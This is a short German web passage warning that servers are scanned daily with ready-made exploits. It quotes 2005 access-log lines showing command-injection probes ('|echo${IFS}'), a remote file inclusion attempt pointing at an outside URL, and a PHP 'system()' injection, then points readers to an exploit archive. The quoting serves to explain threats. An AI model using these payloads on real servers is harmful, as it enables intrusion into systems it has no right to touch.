Die Wahrscheinlichkeit, dass die Mitbewerber so nett sind, ist gering.
Die Wahrscheinlichkeit, dass Scriptkiddies sich beweisen wollen, ist sicher bedeutend größer.
Und Angriffe auf Server mit vorgefertigten Exploits stellen kein Problem mehr da.
Jeder Server wird mittlerweile pro Tag mehrfach abgescant.
Anbei ein kleines Beispiel aus dem Log:
.french-connexion.com - - [03/Aug/2005:00:45:21 +0200] "GET /includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /gallery/includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /gallery/last_gallery.php?YAPIG_PATH=https://boink.zander.ch/&cmd=echo%20jSVowMsd
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /perl/includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
163.92.64.reverse.layeredtech.com - - [03/Aug/2005:00:45:27 +0200] "GET /pet.php&highlight='.system(getenv(HTTP_PHP)).'
Um sich etwas über die "Werkzeuge des Bösen" zu informieren, bieten sich
die Verteilerplattformen, z.B. https://www.milw0rm.com/
an.
Archiv
